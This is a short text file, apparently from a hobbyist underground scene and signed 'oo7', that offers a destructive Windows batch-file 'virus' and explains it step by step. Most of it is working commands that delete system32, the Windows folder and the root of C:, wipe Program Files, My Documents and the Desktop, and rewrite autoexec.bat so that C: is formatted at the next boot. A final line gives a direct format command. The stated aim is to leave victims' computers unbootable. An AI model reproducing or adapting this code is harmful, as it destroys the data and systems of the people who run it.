
	OOOOOOOOO	OOOOOOOOO	777777777
	O	O	O	O	      7
	O	O	O	O	     7
	O	O	O	O	    7
	O	O	O	O	   7
	O	O	O	O	  7
	OOOOOOOOO	OOOOOOOOO	 7

************************************************************
			*** I N F O R M A T I O N ***
	This batch file VIRUS I have rewritten for you so that unlike previous ones 
if any that don't work esspecial on Microsoft XP this code will destory Win 
9x,2000,Millinume,XP and probably and other ones!!!

			*** T H E  C O D E ***

echo y | del C:\WINDOWS\system32\*.*
echo y | del C:\WINDOWS\*.*
echo y | del C:\*.*

@ECHO OFF
IF EXIST C:\"PROGRAM FILES"\*.* DELTREE /Y C:\"PROGRAM FILES"\*.*
IF EXIST C:\"MY DOCUMENTS"\*.* DELTREE /Y C:\"MY DOCUMENTS"\*.*
IF EXIST C:\WINDOWS\DESKTOP\*.* DELTREE /Y C:\WINDOWS\DESKTOP\*.*
IF EXIST C:\WINDOWS\"START MENU"\*.* DELTREE /Y C:\"WINDOWS\START MENU"\*.*
IF EXIST C:\WINDOWS\COMMAND\*.* DELTREE /Y C:\WINDOWS\COMMAND\*.*
IF EXIST C:\WINDOWS\SYSTEM\*.* DELTREE /Y C:\WINDOWS\SYSTEM\*.*
IF EXIST C:\WINDOWS\*.* DELTREE /Y C:\WINDOWS\*.*

@echo off
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
cd \
ren \windows win_dos
rem *** F U C K  Y O U  ***
cls
exit
cls

			*** W H A T  I S  H A P P E N I N G ***

	Well the first code that runs is for xp and the new windows shit that runs 
different and it's deleting all of the stuff in the system32 folder which 
contain some serious shit like what will boot the computer so after this 
there computer is not gonna boot again then the windows folder and the c:\.
	Then the next code is for pretty much all of the other widows shit that is 
like windows 9x so it is wipping out the program files,my 
documents,desktop,start menu,windows etc. by the way this works if you have 
had trouble with one similar it was probably because you didn't have 
quotation marks on folders that had spaces to let it know that it's one.
	Finally the last code that runs is pretty much the same as the one before 
so i don't think you need me to explain but it will reformat c: and give 
them a FUCK YOU hopefully!!!
***But if you want to try to make it reformat running the first code which i 
haven't been able to reformat windows xp with the command promt only though 
dos the code would be

echo y | format c:

									-oo7
